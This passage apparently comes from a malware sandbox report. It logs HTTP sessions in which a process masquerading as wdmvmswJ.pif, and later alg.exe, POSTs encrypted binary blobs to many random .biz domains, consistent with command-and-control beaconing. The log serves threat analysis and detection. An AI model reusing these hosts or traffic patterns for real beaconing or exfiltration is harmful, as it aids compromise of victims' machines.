User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:50.766902924 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a2ebd1c3513f0d6504e2802380277266|173.254.250.82|1730445830|1730445830|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49741 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:50.814048052 CET | 348 | OUT | POST /xnnwo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49742 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:51.056709051 CET | 356 | OUT | POST /iobhvfdyhggtu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:52.493208885 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6820ae9761b57032d8f4bfc6a254f9dd|173.254.250.82|1730445832|1730445832|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49743 | 172.234.222.143 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:52.710937977 CET | 344 | OUT | POST /mbh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:52.710978985 CET | 802 | OUT | Data Raw: 42 77 bc 33 29 a5 c4 a2 16 03 00 00 b0 b2 b8 f3 6c 14 7d cd fd 69 f9 e5 ec a9 f1 36 a0 50 7e 5e 06 18 6c 2e 30 e4 6a eb 1c 9c dc 73 c9 b3 b1 5f 4a 09 e8 3a 7d 50 68 8c 63 b1 43 2a 58 66 78 14 34 56 96 2d 57 ec b6 6e 8c c7 b5 bc 7e 00 ea 66 c7 e1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Bw3)l}i6P~^l.0js_J:}PhcC*Xfx4V-Wn~fTC+"73T6-!=*BM9&hZ&(_UT:hn+&n4nE}m \L!<'\tuMmlPFgm{`jDA'.vg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49744 | 172.234.222.143 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:53.418502092 CET | 356 | OUT | POST /sjajebqyfvuqndq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:53.418525934 CET | 802 | OUT | Data Raw: 6e 5f ef 45 9c 3c 60 1c 16 03 00 00 cb 82 a2 1c 65 91 f2 0e c3 ef c1 11 9a 2c 37 da 4a ba 61 8b 75 b7 7b 51 87 f7 67 dd ac 69 da 37 8b c8 7e 69 e0 b7 9d e6 1e 8e 9f 49 89 9a 47 3b df 92 1c 7e b5 6a 5f 57 fe c8 b6 42 3d 4f a5 86 35 88 7f ad 60 c6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n_E<`e,7Jau{Qgi7~iIG;~j_WB=O5`w^/[`TlDz,';gClTMy?gpW(x#fi<w+/gmVs7f9XubB, -[}9,?zat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49745 | 34.246.200.160 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:54.299376965 CET | 354 | OUT | POST /dujlogesynfu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:54.299403906 CET | 802 | OUT | Data Raw: 2b e9 10 ab 16 cb bc ea 16 03 00 00 46 2c 85 e2 50 7d b0 9f fd 31 38 f2 80 cf 6f f3 3d a8 c3 ed 12 e6 92 5c 11 55 a1 a2 ed 37 e6 d4 62 02 da 7d cc 8e 81 7e 03 49 57 bc 5b 9e 5b a0 97 1b 31 77 7e 72 ec 95 a6 16 82 aa 28 86 7a f7 3b 8f 27 1d 41 7c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +F,P}18o=\U7b}~IW[[1w~r(z;'A|6A/.&zI6zH|c%3EAVD]VmgyPH:54H^9(K/G"+c,r`i%%"N&}#&iM6D,QW'
Nov 1, 2024 08:23:55.272229910 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=83edd98c10cf4920d356a0dcfdeb3ee2|173.254.250.82|1730445835|1730445835|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49746 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:55.316514015 CET | 356 | OUT | POST /qautyxiqxdcgavi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:55.316553116 CET | 802 | OUT | Data Raw: 1e a9 b6 f3 c3 aa 1e ba 16 03 00 00 85 b7 63 cf 8d aa 11 08 13 8b 02 ec ae 24 94 88 d7 c8 fe 4d 33 11 e2 3f e3 8a 7d bc 3a 10 5e 48 f1 6a 99 e7 b4 4a 27 dc 0a 04 33 75 94 89 aa e9 66 b7 ad 60 c4 61 9e d3 52 b4 83 c8 4d 57 32 a2 e8 ca ab 55 fe 2f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c$M3?}:^HjJ'3uf`aRMW2U/p{F8Fw!X_+P:s9:oJ2wsW>1Kis:8jhJ"1IHL[Lh095"w;+#^=]HhAu:9hU
Nov 1, 2024 08:23:55.978889942 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b73a4f14b0341030d430cc6b93fcebbe|173.254.250.82|1730445835|1730445835|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49747 | 82.112.184.197 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:55.935396910 CET | 358 | OUT | POST /vdvikkmvoibst HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:55.935436010 CET | 778 | OUT | Data Raw: (binary request body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49748 | 208.100.26.245 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:56.015181065 CET | 346 | OUT | POST /go HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:56.015197992 CET | 802 | OUT | Data Raw: (binary request body)
Nov 1, 2024 08:23:56.651983023 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 01 Nov 2024 07:23:56 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 1, 2024 08:23:56.679869890 CET | 360 | OUT | POST /bvawourmbxmjmarr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:56.679891109 CET | 802 | OUT | Data Raw: (binary request body)
Nov 1, 2024 08:23:56.824629068 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 01 Nov 2024 07:23:56 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 49749 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:56.869976997 CET | 351 | OUT | POST /uquynocac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:23:56.869997025 CET | 802 | OUT | Data Raw: (binary request body)
Nov 1, 2024 08:23:58.305274963 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dcf8d96d91e7754a8e4d47be24f2b346|173.254.250.82|1730445838|1730445838|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49750 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:58.344016075 CET | 348 | OUT | POST /igs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:58.344037056 CET | 802 | OUT | Data Raw: f2 be 62 4f 2b 1c 68 18 16 03 00 00 36 9c f7 27 67 ed 46 06 1c 23 d1 c7 1a 68 08 fa 05 f0 63 ed ba 5f cd 0f 7f 69 21 07 f4 25 0f a5 5e c7 8e 81 58 7e 2a e0 7f 51 18 88 7d cc 08 1b 7c 56 ea ec 63 38 51 00 c1 38 61 99 07 13 4f 5a cb 0b 36 c2 31 2b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bO+h6'gF#hc_i!%^X~*Q}|Vc8Q8aOZ61+f3FT|ZGt}S)*jaqI*(x`~c Hl7W5?p;Y 0F&1V|?,=gC+E=vDj0,?1ZaWc,p|oyka=[2M
Nov 1, 2024 08:23:59.009752035 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d0510afe44841ac23c14b25e59ffc693|173.254.250.82|1730445838|1730445838|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49751 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:59.240247011 CET | 354 | OUT | POST /okedkgjfoq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:23:59.240308046 CET | 802 | OUT | Data Raw: cf 9e 30 2b 16 ee 0c 73 16 03 00 00 67 5d 2a d5 94 d9 53 48 4e 1d 7a 41 27 a0 a3 f9 92 0b d5 f3 4c c3 a3 f9 a4 a1 59 94 2b af 99 6f a8 6b e8 c0 a8 2d 26 0d fd c2 27 c6 f9 2c 4b ce a4 6e d0 0e 69 a1 a9 06 47 84 61 43 8b 0b 8b 40 30 de d0 91 96 f4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0+sg]*SHNzA'LY+ok-&',KniGaC@0eJBNRh;N+ZID4ng[t16*4^XEQ0)!wB1go5 NQwOEX{nGl"{jBVVfTZb3y|r%FM?ej7-Em
Nov 1, 2024 08:24:00.036258936 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=61e9b3b450ef437a1b2c0cfc9c425b5c|173.254.250.82|1730445839|1730445839|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 49752 | 47.129.31.212 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:59.473386049 CET | 357 | OUT | POST /wfcpepuolxclud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:23:59.473386049 CET | 778 | OUT | Data Raw: 83 4f d6 af 4b b0 c7 dc fe 02 00 00 ce 27 93 3c 03 1c 77 75 46 d5 db 3a 7a e0 be 05 96 a4 bd fe 8b db 15 a7 2f ec 60 ac c2 60 c8 0e d5 66 a4 a9 6a e4 0e d0 d0 82 0a 58 6a 63 fc bf 1a 0a 2e 8e ef 58 a3 8a 7e 98 1c 8d c5 c5 6f d4 88 0d 4a 19 a9 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: OK'<wuF:z/``fjXjc.X~oJ6;h#uA0-)HLtM}kyu;FP.}'`.y3X4R.25h&6oc{8vZ`"Kokmb`y_>ZRyi$xT0"k3SjqM
Nov 1, 2024 08:24:00.920274019 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=42f049b98f4e8f62c4b1497303d43fcb|173.254.250.82|1730445840|1730445840|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49753 | 35.164.78.200 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:00.088469982 CET | 346 | OUT | POST /mwes HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:00.088490963 CET | 802 | OUT | Data Raw: a7 35 f6 67 2b 07 a8 17 16 03 00 00 a4 97 ab 86 74 8a 4c 20 7c 85 d8 a6 23 77 07 0a 96 ed 94 50 05 e4 6d e8 4b b8 06 e8 87 9a 7f e6 b6 25 90 95 a8 e0 4f 97 de 27 1f d9 e4 f6 68 a9 59 19 41 3a 14 0d ba 50 e3 1d 22 5c ea 71 f0 c1 03 da 80 3e 24 00
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5g+tL |#wPmK%O'hYA:P"\q>$0&^2v|`pA.a_726O~/4oJPk_RD$ZCG8s&)np0sAE[ /mvS>#7U1_(DA?H\nBd
Nov 1, 2024 08:24:00.923737049 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=aab7b4a6c2c35e6775ab6a0236b8aaf5|173.254.250.82|1730445840|1730445840|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 49754 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:01.224255085 CET | 344 | OUT | POST /im HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
